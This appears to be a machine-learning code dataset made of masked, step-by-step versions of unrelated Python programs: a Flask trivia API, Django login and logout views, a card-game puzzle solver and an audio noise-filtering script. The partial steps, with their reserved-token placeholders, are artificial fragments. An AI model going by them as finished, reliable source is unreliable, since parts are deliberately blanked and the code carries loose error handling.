"step-5": "import os\nimport sys\nfrom flask import Flask, request, abort, flash, jsonify, Response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom flask_migrate import Migrate\nimport random\nimport unittest\n\nfrom models import db, Question, Category\n\n# set the number of pages fpr pagination\nQUESTIONS_PER_PAGE = 10\n\n# create and configure the app\napp = Flask(__name__)\napp.config.from_object('config')\ndb.init_app(app)\nmigrate = Migrate(app, db)\n\n# set up cors for the application\ncors = CORS(app, resources={r'/': {'origins': '*'}})\n\n# to set Access-Control-Allow Headers and Methods\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n# endpoint to handle GET requests for all available categories\n@app.route('/categories', methods=['GET'])\ndef get_categories():\n categories = [category.type for category in Category.query.all()]\n return jsonify({'categories': categories, 'success': True})\n\n# endpoint to handle GET requests for questions with pagination\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n # if question id is not an integer\n if type(page) is not int:\n # let them know their input is not processable\n abort(422)\n # ensure proper request method\n if request.method == 'GET':\n try:\n # query for all categories\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n # let the user know that no resource was found\n abort(404)\n\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n # let the user know that no resource was found\n abort(404)\n if len(query.items) == 0:\n # let the user know that no resource was 
found\n error = True\n\n results = query.items\n # format data\n for question in results:\n _question_ = {\n 'id': question.id,\n 'question': question.question,\n 'answer': question.answer,\n 'category': question.category,\n 'difficulty': question.difficulty\n }\n questions.append(_question_)\n except Exception:\n # set error to true and log on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n\n if error:\n # let the user know their request was not successful\n abort(400)\n else:\n # if successful send back success response\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'total_questions': total_questions,\n 'categories': categories\n })\n else:\n # send method not allowed error\n abort(405)\n\n\n# endpoint to delete a question from the database\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n\n # ensure proper request method\n if request.method == 'DELETE':\n\n # if question id is not an integer\n if type(question_id) is not int:\n # let them know their input is not processable\n abort(422)\n\n try:\n # get user selected question from database\n question = Question.query.get(question_id)\n # stage question delete\n db.session.delete(question)\n # commit deletion to the database\n db.session.commit()\n except Exception:\n # set error to true and log on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n # close database session\n db.session.close()\n\n if error:\n # send bad request error\n abort(400)\n\n else:\n # if no error send success object and log on server\n return jsonify({\n 'success': True,\n 'method': 'Delete',\n 'question': question_id\n })\n else:\n # send method not allowed error\n abort(405)\n\n\n# endpoint to add a question to the database\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n\n # ensure proper request method\n if request.method == 'POST':\n try:\n # 
format data for database\n new_question = Question(\n question=request.json['question'],\n answer=request.json['answer'],\n category=request.json['category'],\n difficulty=request.json['difficulty']\n )\n # stage data in database\n db.session.add(new_question)\n # commit data to database\n db.session.commit()\n\n except Exception:\n # set error to true and log on the server\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n # close database session\n db.session.close()\n\n if error:\n # send bad request error\n abort(400)\n else:\n # if no error send success object and log on server\n print('Added: {}'.format(new_question))\n return jsonify({\n 'success': True,\n 'question': request.json\n\n })\n else:\n # send method not allowed error\n abort(405)\n\n\n# endpoint to search for for questions in the database\n@app.route('/questions/search', methods=['POST'])\ndef search_questions():\n error = False\n\n # ensure proper request method\n if request.method == 'POST':\n\n # set esrch term from user request\n search_term = str(request.json['searchTerm'])\n # if the user submits something other than a string of text block it\n if type(search_term) is not str:\n # let them know their input is not processable\n abort(422)\n\n try:\n # query database using user provided search term\n query_results = Question.query.filter(\n Question.question.ilike('%{}%'.format(search_term))).all()\n questions = []\n # get categories from database\n categories = [category.type for category in Category.query.all()]\n # format response data\n for question in query_results:\n _question_ = {\n 'id': question.id,\n 'question': question.question,\n 'answer': question.answer,\n 'category': question.category,\n 'difficulty': question.difficulty\n }\n questions.append(_question_)\n\n except Exception:\n # set error to true and log on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n if error:\n # send bad request error\n 
abort(400)\n else:\n # if no error send success object\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'total_questions': len(questions),\n 'current_category': ''\n })\n else:\n # send method not allowed error\n abort(405)\n\n# endpoint to get questions by a specific category\n@app.route('/category/<int:category_id>/questions', methods=['GET'])\ndef get_questions_by_category(category_id):\n error = False\n\n # ensure proper request method\n if request.method == 'GET':\n\n # if category id is not an integer\n if type(category_id) is not int:\n # let them know their input is not processable\n abort(422)\n\n try:\n # get questions by user selected category\n query = Question.query.filter_by(category=str(category_id)).all()\n questions = []\n # format response data\n for question in query:\n _question_ = {\n 'id': question.id,\n 'question': question.question,\n 'answer': question.answer,\n 'category': question.category,\n 'difficulty': question.difficulty\n }\n questions.append(_question_)\n except Exception:\n # set error to true and log on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n if error:\n # send bad request error\n abort(400)\n else:\n # if no error send success object\n return jsonify({\n 'success': True,\n 'questions': questions,\n 'total_questions': len(questions),\n 'current_category': ''\n })\n else:\n # send method not allowed error\n abort(405)\n\n# endpoint to initiate quiz\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n\n # ensure proper request method\n if request.method == 'POST':\n\n try:\n data = request.json\n # get questions from any category\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n # get questions from user specified caetgory\n else:\n query = Question.query.filter_by(\n category=str(int(data['quiz_category']['id'])+1)).all()\n # randomly select new non previously selected question\n previous_questions = 
data['previous_questions']\n index = random.randint(0, len(query)-1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n # reassign index if already used\n index = random.randint(0, len(query)-1)\n potential_question = query[index]\n else:\n selected = True\n # set question\n _question_ = potential_question\n # format data\n next_question = {\n 'id': _question_.id,\n 'question': _question_.question,\n 'answer': _question_.answer,\n 'category': _question_.category,\n 'difficulty': _question_.difficulty\n }\n except Exception:\n # set error and log error on the server\n error = True\n print('Error: {}'.format(sys.exc_info()))\n\n finally:\n\n if error:\n # send internal server error\n abort(500)\n else:\n # if no error send success object\n return jsonify({\n 'success': True,\n 'question': next_question\n })\n else:\n # send method not allowed error\n abort(405)\n\n# handle bad request errors\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"Bad Request\"\n }), 400\n\n# handle resource not found errors\n@app.errorhandler(404)\ndef resource_not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"Resource Not Found\"\n }), 404\n\n# handle resource not found errors\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({\n \"success\": False,\n \"error\": 405,\n \"message\": \"Method Not Allowed\"\n }), 405\n\n# handle unprocessable entity errors\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"Unprocessable Entity\"\n }), 422\n\n# handle internal server errors\n@app.errorhandler(500)\ndef internal_server_error(error):\n return jsonify({\n \"success\": False,\n \"error\": 500,\n \"message\": \"Internal Server Error\"\n }), 500\n\n\n# Default port:\nif __name__ == '__main__':\n 
app.run()\n",
"step-ids": [
8,
10,
12,
14,
17
]
}
|
[
8,
10,
12,
14,
17
] |
<|reserved_special_token_0|>
class logout_view(View):
    """End the current session and send the user back to the login page."""

    def get(self, request):
        # Flush the session server-side first, then redirect.
        logout(request)
        return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
    """Admin dashboard landing page; requires an authenticated session."""

    template_name = 'adminbiobses/index.html'

    def get(self, request):
        # No extra context is needed; render the dashboard template as-is.
        return render(request, self.template_name)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class login_view(View):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class logout_view(View):
def get(self, request):
logout(request)
return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
template_name = 'adminbiobses/index.html'
def get(self, request):
return render(request, self.template_name)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class login_view(View):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def post(self, request):
user = authenticate(username=request.POST['username'], password=
request.POST['password'])
if user is not None:
if user.is_active:
try:
login(request, user)
request.session['user_id'] = user.id
request.session['username'] = user.username
request.session['name'
] = user.first_name + ' ' + user.last_name or ''
except:
messages.add_message(request, messages.INFO,
'Anda belum terdaftar, silahkan hubungi administrator')
return redirect('adminbiobses:index')
else:
messages.add_message(request, messages.INFO,
'user belum terverifikasi')
else:
messages.add_message(request, messages.INFO,
'user atau password anda salah')
return render(request, self.template_name)
class logout_view(View):
def get(self, request):
logout(request)
return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
template_name = 'adminbiobses/index.html'
def get(self, request):
return render(request, self.template_name)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class login_view(View):
<|reserved_special_token_0|>
def get(self, request):
return render(request, self.template_name)
def post(self, request):
user = authenticate(username=request.POST['username'], password=
request.POST['password'])
if user is not None:
if user.is_active:
try:
login(request, user)
request.session['user_id'] = user.id
request.session['username'] = user.username
request.session['name'
] = user.first_name + ' ' + user.last_name or ''
except:
messages.add_message(request, messages.INFO,
'Anda belum terdaftar, silahkan hubungi administrator')
return redirect('adminbiobses:index')
else:
messages.add_message(request, messages.INFO,
'user belum terverifikasi')
else:
messages.add_message(request, messages.INFO,
'user atau password anda salah')
return render(request, self.template_name)
class logout_view(View):
def get(self, request):
logout(request)
return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
template_name = 'adminbiobses/index.html'
def get(self, request):
return render(request, self.template_name)
<|reserved_special_token_1|>
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, logout, login
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.views import View
class login_view(View):
template_name = 'adminbiobses/login.html'
def get(self, request):
return render(request, self.template_name)
def post(self, request):
user =authenticate(username=request.POST['username'],password=request.POST['password'])
if user is not None :
if user.is_active :
try :
login(request, user)
request.session['user_id'] = user.id
request.session['username'] = user.username
request.session['name'] = user.first_name+' '+user.last_name or ''
except :
messages.add_message(request, messages.INFO, 'Anda belum terdaftar, silahkan hubungi administrator')
return redirect('adminbiobses:index')
else :
messages.add_message(request, messages.INFO, 'user belum terverifikasi')
else :
messages.add_message(request, messages.INFO, 'user atau password anda salah')
return render(request, self.template_name)
class logout_view(View):
def get(self, request):
logout(request)
return redirect('adminbiobses:login')
@method_decorator(login_required, name='dispatch')
class index(View):
template_name = 'adminbiobses/index.html'
def get(self, request):
return render(request, self.template_name)
|
flexible
|
{
"blob_id": "e4e2e8ca65d109805b267f148e8d255d81d4ee83",
"index": 1801,
"step-1": "<mask token>\n\n\nclass logout_view(View):\n\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n\n def get(self, request):\n return render(request, self.template_name)\n",
"step-2": "<mask token>\n\n\nclass login_view(View):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass logout_view(View):\n\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n\n def get(self, request):\n return render(request, self.template_name)\n",
"step-3": "<mask token>\n\n\nclass login_view(View):\n <mask token>\n <mask token>\n\n def post(self, request):\n user = authenticate(username=request.POST['username'], password=\n request.POST['password'])\n if user is not None:\n if user.is_active:\n try:\n login(request, user)\n request.session['user_id'] = user.id\n request.session['username'] = user.username\n request.session['name'\n ] = user.first_name + ' ' + user.last_name or ''\n except:\n messages.add_message(request, messages.INFO,\n 'Anda belum terdaftar, silahkan hubungi administrator')\n return redirect('adminbiobses:index')\n else:\n messages.add_message(request, messages.INFO,\n 'user belum terverifikasi')\n else:\n messages.add_message(request, messages.INFO,\n 'user atau password anda salah')\n return render(request, self.template_name)\n\n\nclass logout_view(View):\n\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n\n def get(self, request):\n return render(request, self.template_name)\n",
"step-4": "<mask token>\n\n\nclass login_view(View):\n <mask token>\n\n def get(self, request):\n return render(request, self.template_name)\n\n def post(self, request):\n user = authenticate(username=request.POST['username'], password=\n request.POST['password'])\n if user is not None:\n if user.is_active:\n try:\n login(request, user)\n request.session['user_id'] = user.id\n request.session['username'] = user.username\n request.session['name'\n ] = user.first_name + ' ' + user.last_name or ''\n except:\n messages.add_message(request, messages.INFO,\n 'Anda belum terdaftar, silahkan hubungi administrator')\n return redirect('adminbiobses:index')\n else:\n messages.add_message(request, messages.INFO,\n 'user belum terverifikasi')\n else:\n messages.add_message(request, messages.INFO,\n 'user atau password anda salah')\n return render(request, self.template_name)\n\n\nclass logout_view(View):\n\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n\n def get(self, request):\n return render(request, self.template_name)\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, logout, login\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\n\nclass login_view(View):\n template_name = 'adminbiobses/login.html'\n\n def get(self, request):\n return render(request, self.template_name)\n\n def post(self, request):\n user =authenticate(username=request.POST['username'],password=request.POST['password'])\n if user is not None :\n if user.is_active :\n try :\n login(request, user)\n request.session['user_id'] = user.id\n request.session['username'] = user.username\n request.session['name'] = user.first_name+' '+user.last_name or ''\n except :\n messages.add_message(request, messages.INFO, 'Anda belum terdaftar, silahkan hubungi administrator')\n return redirect('adminbiobses:index')\n else :\n messages.add_message(request, messages.INFO, 'user belum terverifikasi')\n else :\n messages.add_message(request, messages.INFO, 'user atau password anda salah')\n \n return render(request, self.template_name)\n\nclass logout_view(View):\n def get(self, request):\n logout(request)\n return redirect('adminbiobses:login')\n\n@method_decorator(login_required, name='dispatch')\nclass index(View):\n template_name = 'adminbiobses/index.html'\n def get(self, request):\n return render(request, self.template_name)\n ",
"step-ids": [
5,
6,
7,
8,
11
]
}
|
[
5,
6,
7,
8,
11
] |
def parse(filename):
t1, t2 = open(filename).read().strip().split("\n\n")
return tuple(map(lambda x: list(map(int, x.split("\n")[1:])), [t1, t2]))
def score(deck):
res = 0
for i in range(len(deck)):
res += deck[i] * (len(deck)-i)
return res
def solution1(deck1, deck2):
while len(deck1) > 0 and len(deck2) > 0:
p1, p2 = deck1[0], deck2[0]
if p1 > p2:
deck1 = deck1[1:] + [p1, p2]
deck2 = deck2[1:]
else:
deck1 = deck1[1:]
deck2 = deck2[1:] + [p2, p1]
if len(deck1) > 0:
return score(deck1)
return score(deck2)
def can_recurse(deck1, deck2):
p1, p2 = deck1[0], deck2[0]
return p1 <= len(deck1) - 1 and p2 <= len(deck2) - 1
def combat(deck1, deck2):
db = set()
while len(deck1) > 0 and len(deck2) > 0:
key = (tuple(deck1), tuple(deck2))
if key in db:
return "p1", score(deck1)
db.add(key)
p1, p2 = deck1[0], deck2[0]
if can_recurse(deck1, deck2):
winner, _ = combat(deck1[1:p1+1], deck2[1:p2+1])
else:
winner = "p1" if p1 > p2 else "p2"
if winner == "p1":
deck1 = deck1[1:] + [p1, p2]
deck2 = deck2[1:]
else:
deck1 = deck1[1:]
deck2 = deck2[1:] + [p2, p1]
if len(deck1) > 0:
return "p1", score(deck1)
return "p2", score(deck2)
def solution2(deck1, deck2):
return combat(deck1, deck2)[1]
def main():
print(solution1(*parse("sample.txt")))
print(solution1(*parse("input.txt")))
print(solution2(*parse("sample.txt")))
print(solution2(*parse("input.txt")))
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "508d016161131481ace41f3d3bda005423125fe5",
"index": 5635,
"step-1": "def parse(filename):\n t1, t2 = open(filename).read().strip().split('\\n\\n')\n return tuple(map(lambda x: list(map(int, x.split('\\n')[1:])), [t1, t2]))\n\n\ndef score(deck):\n res = 0\n for i in range(len(deck)):\n res += deck[i] * (len(deck) - i)\n return res\n\n\n<mask token>\n\n\ndef combat(deck1, deck2):\n db = set()\n while len(deck1) > 0 and len(deck2) > 0:\n key = tuple(deck1), tuple(deck2)\n if key in db:\n return 'p1', score(deck1)\n db.add(key)\n p1, p2 = deck1[0], deck2[0]\n if can_recurse(deck1, deck2):\n winner, _ = combat(deck1[1:p1 + 1], deck2[1:p2 + 1])\n else:\n winner = 'p1' if p1 > p2 else 'p2'\n if winner == 'p1':\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return 'p1', score(deck1)\n return 'p2', score(deck2)\n\n\n<mask token>\n\n\ndef main():\n print(solution1(*parse('sample.txt')))\n print(solution1(*parse('input.txt')))\n print(solution2(*parse('sample.txt')))\n print(solution2(*parse('input.txt')))\n\n\n<mask token>\n",
"step-2": "def parse(filename):\n t1, t2 = open(filename).read().strip().split('\\n\\n')\n return tuple(map(lambda x: list(map(int, x.split('\\n')[1:])), [t1, t2]))\n\n\ndef score(deck):\n res = 0\n for i in range(len(deck)):\n res += deck[i] * (len(deck) - i)\n return res\n\n\n<mask token>\n\n\ndef combat(deck1, deck2):\n db = set()\n while len(deck1) > 0 and len(deck2) > 0:\n key = tuple(deck1), tuple(deck2)\n if key in db:\n return 'p1', score(deck1)\n db.add(key)\n p1, p2 = deck1[0], deck2[0]\n if can_recurse(deck1, deck2):\n winner, _ = combat(deck1[1:p1 + 1], deck2[1:p2 + 1])\n else:\n winner = 'p1' if p1 > p2 else 'p2'\n if winner == 'p1':\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return 'p1', score(deck1)\n return 'p2', score(deck2)\n\n\ndef solution2(deck1, deck2):\n return combat(deck1, deck2)[1]\n\n\ndef main():\n print(solution1(*parse('sample.txt')))\n print(solution1(*parse('input.txt')))\n print(solution2(*parse('sample.txt')))\n print(solution2(*parse('input.txt')))\n\n\n<mask token>\n",
"step-3": "def parse(filename):\n t1, t2 = open(filename).read().strip().split('\\n\\n')\n return tuple(map(lambda x: list(map(int, x.split('\\n')[1:])), [t1, t2]))\n\n\ndef score(deck):\n res = 0\n for i in range(len(deck)):\n res += deck[i] * (len(deck) - i)\n return res\n\n\n<mask token>\n\n\ndef can_recurse(deck1, deck2):\n p1, p2 = deck1[0], deck2[0]\n return p1 <= len(deck1) - 1 and p2 <= len(deck2) - 1\n\n\ndef combat(deck1, deck2):\n db = set()\n while len(deck1) > 0 and len(deck2) > 0:\n key = tuple(deck1), tuple(deck2)\n if key in db:\n return 'p1', score(deck1)\n db.add(key)\n p1, p2 = deck1[0], deck2[0]\n if can_recurse(deck1, deck2):\n winner, _ = combat(deck1[1:p1 + 1], deck2[1:p2 + 1])\n else:\n winner = 'p1' if p1 > p2 else 'p2'\n if winner == 'p1':\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return 'p1', score(deck1)\n return 'p2', score(deck2)\n\n\ndef solution2(deck1, deck2):\n return combat(deck1, deck2)[1]\n\n\ndef main():\n print(solution1(*parse('sample.txt')))\n print(solution1(*parse('input.txt')))\n print(solution2(*parse('sample.txt')))\n print(solution2(*parse('input.txt')))\n\n\n<mask token>\n",
"step-4": "def parse(filename):\n t1, t2 = open(filename).read().strip().split('\\n\\n')\n return tuple(map(lambda x: list(map(int, x.split('\\n')[1:])), [t1, t2]))\n\n\ndef score(deck):\n res = 0\n for i in range(len(deck)):\n res += deck[i] * (len(deck) - i)\n return res\n\n\ndef solution1(deck1, deck2):\n while len(deck1) > 0 and len(deck2) > 0:\n p1, p2 = deck1[0], deck2[0]\n if p1 > p2:\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return score(deck1)\n return score(deck2)\n\n\ndef can_recurse(deck1, deck2):\n p1, p2 = deck1[0], deck2[0]\n return p1 <= len(deck1) - 1 and p2 <= len(deck2) - 1\n\n\ndef combat(deck1, deck2):\n db = set()\n while len(deck1) > 0 and len(deck2) > 0:\n key = tuple(deck1), tuple(deck2)\n if key in db:\n return 'p1', score(deck1)\n db.add(key)\n p1, p2 = deck1[0], deck2[0]\n if can_recurse(deck1, deck2):\n winner, _ = combat(deck1[1:p1 + 1], deck2[1:p2 + 1])\n else:\n winner = 'p1' if p1 > p2 else 'p2'\n if winner == 'p1':\n deck1 = deck1[1:] + [p1, p2]\n deck2 = deck2[1:]\n else:\n deck1 = deck1[1:]\n deck2 = deck2[1:] + [p2, p1]\n if len(deck1) > 0:\n return 'p1', score(deck1)\n return 'p2', score(deck2)\n\n\ndef solution2(deck1, deck2):\n return combat(deck1, deck2)[1]\n\n\ndef main():\n print(solution1(*parse('sample.txt')))\n print(solution1(*parse('input.txt')))\n print(solution2(*parse('sample.txt')))\n print(solution2(*parse('input.txt')))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "def parse(filename):\n\tt1, t2 = open(filename).read().strip().split(\"\\n\\n\")\n\treturn tuple(map(lambda x: list(map(int, x.split(\"\\n\")[1:])), [t1, t2]))\n\ndef score(deck):\n\tres = 0\n\tfor i in range(len(deck)):\n\t\tres += deck[i] * (len(deck)-i)\n\treturn res\n\ndef solution1(deck1, deck2):\n\twhile len(deck1) > 0 and len(deck2) > 0:\n\t\tp1, p2 = deck1[0], deck2[0]\n\t\tif p1 > p2:\n\t\t\tdeck1 = deck1[1:] + [p1, p2]\n\t\t\tdeck2 = deck2[1:]\n\t\telse:\n\t\t\tdeck1 = deck1[1:]\n\t\t\tdeck2 = deck2[1:] + [p2, p1]\n\tif len(deck1) > 0:\n\t\treturn score(deck1)\n\treturn score(deck2)\n\ndef can_recurse(deck1, deck2):\n\tp1, p2 = deck1[0], deck2[0]\n\treturn p1 <= len(deck1) - 1 and p2 <= len(deck2) - 1\n\ndef combat(deck1, deck2):\n\tdb = set()\n\twhile len(deck1) > 0 and len(deck2) > 0:\n\t\tkey = (tuple(deck1), tuple(deck2))\n\t\tif key in db:\n\t\t\treturn \"p1\", score(deck1)\n\t\tdb.add(key)\n\n\t\tp1, p2 = deck1[0], deck2[0]\n\n\t\tif can_recurse(deck1, deck2):\n\t\t\twinner, _ = combat(deck1[1:p1+1], deck2[1:p2+1])\n\t\telse:\n\t\t\twinner = \"p1\" if p1 > p2 else \"p2\"\n\n\t\tif winner == \"p1\":\n\t\t\tdeck1 = deck1[1:] + [p1, p2]\n\t\t\tdeck2 = deck2[1:]\n\t\telse:\n\t\t\tdeck1 = deck1[1:]\n\t\t\tdeck2 = deck2[1:] + [p2, p1]\n\n\tif len(deck1) > 0:\n\t\treturn \"p1\", score(deck1)\n\treturn \"p2\", score(deck2)\n\ndef solution2(deck1, deck2):\n\treturn combat(deck1, deck2)[1]\n\ndef main():\n\tprint(solution1(*parse(\"sample.txt\")))\n\tprint(solution1(*parse(\"input.txt\")))\n\n\tprint(solution2(*parse(\"sample.txt\")))\n\tprint(solution2(*parse(\"input.txt\")))\n\nif __name__ == \"__main__\":\n\tmain()\n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
def Plot_Audio(audio):
s = audio.shape[0]
time = np.arange(s)
plt.plot(time, audio)
plt.show()
def Add_Noise(audio, mu=0, sigma=1):
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.median(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
def Mean_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.mean(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
write('Audio_Modified.wav', rate, audio)
print(audio.shape[0])
print(audio.shape[0] / rate)
def Plot_Audio(audio):
s = audio.shape[0]
time = np.arange(s)
plt.plot(time, audio)
plt.show()
def Add_Noise(audio, mu=0, sigma=1):
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.median(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
def Mean_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.mean(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
Plot_Audio(audio)
<|reserved_special_token_0|>
Plot_Audio(audio)
write('Audio_with_Noise.wav', rate, audio)
<|reserved_special_token_0|>
Plot_Audio(audio_new_mean)
write('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)
<|reserved_special_token_0|>
Plot_Audio(audio_new_median)
write('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
rate, audio_original = read('Audio_Original.wav')
audio = audio_original[:, 0]
write('Audio_Modified.wav', rate, audio)
print(audio.shape[0])
print(audio.shape[0] / rate)
def Plot_Audio(audio):
s = audio.shape[0]
time = np.arange(s)
plt.plot(time, audio)
plt.show()
def Add_Noise(audio, mu=0, sigma=1):
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.median(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
def Mean_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.mean(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
Plot_Audio(audio)
audio = Add_Noise(audio)
Plot_Audio(audio)
write('Audio_with_Noise.wav', rate, audio)
audio_new_mean, time_new = Mean_Filter(audio, 2)
Plot_Audio(audio_new_mean)
write('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)
audio_new_median, time_new = Median_Filter(audio, 2)
Plot_Audio(audio_new_median)
write('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)
<|reserved_special_token_1|>
import numpy as np
import scipy
import matplotlib.pyplot as plt
from scipy.io.wavfile import read
from scipy.io.wavfile import write
rate, audio_original = read('Audio_Original.wav')
audio = audio_original[:, 0]
write('Audio_Modified.wav', rate, audio)
print(audio.shape[0])
print(audio.shape[0] / rate)
def Plot_Audio(audio):
s = audio.shape[0]
time = np.arange(s)
plt.plot(time, audio)
plt.show()
def Add_Noise(audio, mu=0, sigma=1):
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.median(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
def Mean_Filter(audio, M):
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p, q, s = M, audio.shape[0] - M, audio.shape[0]
audio_change = np.zeros(s + 2 * M)
audio_change[M:s + M] = audio
audio_new = np.zeros(s)
for i in range(M, s + M):
audio_new[i - M] = np.mean(audio_change[i - M:i + M])
time = np.arange(s)
return audio_new, time
Plot_Audio(audio)
audio = Add_Noise(audio)
Plot_Audio(audio)
write('Audio_with_Noise.wav', rate, audio)
